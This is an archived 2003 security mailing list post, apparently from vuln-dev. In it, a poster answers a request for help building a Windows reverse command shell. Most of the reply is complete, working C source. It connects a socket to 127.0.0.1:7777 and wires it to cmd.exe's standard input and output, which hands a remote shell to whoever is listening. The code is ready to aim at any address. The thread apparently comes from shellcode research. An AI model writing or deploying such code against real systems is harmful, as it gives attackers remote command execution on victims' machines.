Re: Windows reverse Shell

From: 3APA3A (3APA3A@SECURITY.NNOV.RU)
Date: 02/04/03

Next message: 3APA3A: "Re[2]: Windows reverse Shell"

Previous message: Rob Shein: "RE: Possible DOS against search engines?"
In reply to: NetNinja: "Windows reverse Shell"
Next in thread: 3APA3A: "Re[2]: Windows reverse Shell"
Reply: 3APA3A: "Re[2]: Windows reverse Shell"
Reply: A***: "Re[2]: Windows reverse Shell"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: Tue, 4 Feb 2003 19:34:56 +0300
From: 3APA3A <3APA3A@SECURITY.NNOV.RU>
To: SecFocus <netninja@hotmail.kg>

Dear NetNinja,

Code below successfully brings reverse shell to 127.0.0.1:7777.

#include <windows.h>
#include <winsock2.h>
#include <stdio.h>

int main(int argc, char* argv[]){
WSADATA wd;
HANDLE h;
SOCKET sock;
STARTUPINFO si;
PROCESS_INFORMATION pi;
struct sockaddr_in sin;
int size = sizeof(sin);

memset(&sin, 0, sizeof(sin));
memset(&si, 0, sizeof(si));
WSAStartup(MAKEWORD( 1, 1 ), &wd);
sock=WSASocket(PF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
sin.sin_family = AF_INET;
bind(sock, (struct sockaddr*)&sin, size);
sin.sin_port = htons(7777);
sin.sin_addr.s_addr = inet_addr("127.0.0.1");
connect(sock, (struct sockaddr*)&sin, size);
si.cb = sizeof(si);
si.dwFlags = STARTF_USESTDHANDLES;
si.hStdInput = si.hStdOutput = si.hStdError = sock;
CreateProcess(
        NULL,
        "cmd.exe",
        NULL,
        NULL,
        TRUE,
        0,
        0,
        NULL,
        &si,
        &pi
);
return 0;
}

--Monday, February 3, 2003, 10:37:45 PM, you wrote to vuln-dev@securityfocus.com:

N> Hello guys,

N> David Litchfield in his Blackhat talk, talked about using socket handle
N> from WSASocket() and pass that handle as a parameter to stdin, stdout
N> and stderr for CreateProcess function. By doin this way his reverse
N> cmd shellcode becomes much smaller. I tried coding that reverse
N> command shell in C, but couldnt get it to work. It simply connects to
N> my listening netcat listener and then disconnects. David Litchfield
N> used 4 functions to achieva that WSASocket, bind, connect and
N> CreateProcess. A lil help would b appreciated on building this reverse
N> cmd shell. thanx.

-- 
~/ZARAZA
Почтенные ископаемые! Жду от вас дальнейших писем.  (Твен)

Next message: 3APA3A: "Re[2]: Windows reverse Shell"
Previous message: Rob Shein: "RE: Possible DOS against search engines?"
In reply to: NetNinja: "Windows reverse Shell"
Next in thread: 3APA3A: "Re[2]: Windows reverse Shell"
Reply: 3APA3A: "Re[2]: Windows reverse Shell"
Reply: A***: "Re[2]: Windows reverse Shell"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]